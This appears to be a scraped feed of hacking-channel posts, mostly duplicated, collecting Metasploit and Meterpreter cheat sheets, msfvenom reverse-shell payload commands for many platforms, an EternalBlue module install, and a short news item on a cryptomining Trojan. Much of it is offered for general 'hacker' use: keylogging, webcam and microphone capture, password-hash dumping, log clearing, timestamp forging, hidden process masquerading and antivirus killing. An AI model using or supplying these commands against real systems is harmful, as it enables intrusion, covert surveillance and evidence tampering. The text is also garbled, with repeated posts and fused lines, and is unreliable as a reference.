▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Mobile Application Test Notes (iPhone)
Prepping Device and Application:
+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working
Prepping Burp Suite:
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.
+ Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/
Notes:
+ Application file type - x.ipa
+ Easy way:
- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Mobile Application Test Notes (iPhone)
Prepping Device and Application:
+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working
Prepping Burp Suite:
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.
+ Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/
Notes:
+ Application file type - x.ipa
+ Easy way:
- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM database▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM database▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Materpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Materpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Bypassing Application Whitelisting By Using dnx.exe.pdf
226.5 KB
The Most requested hacking tutorial :
Bypassing Application Whitelisting By Using dnx.exe
Bypassing Application Whitelisting By Using dnx.exe
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Helpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Helpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Freebuf
图解Meterpreter实现网络穿透的方法 - FreeBuf网络安全行业门户
本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Crack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor ≈ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Crack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor ≈ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑The latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑The latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
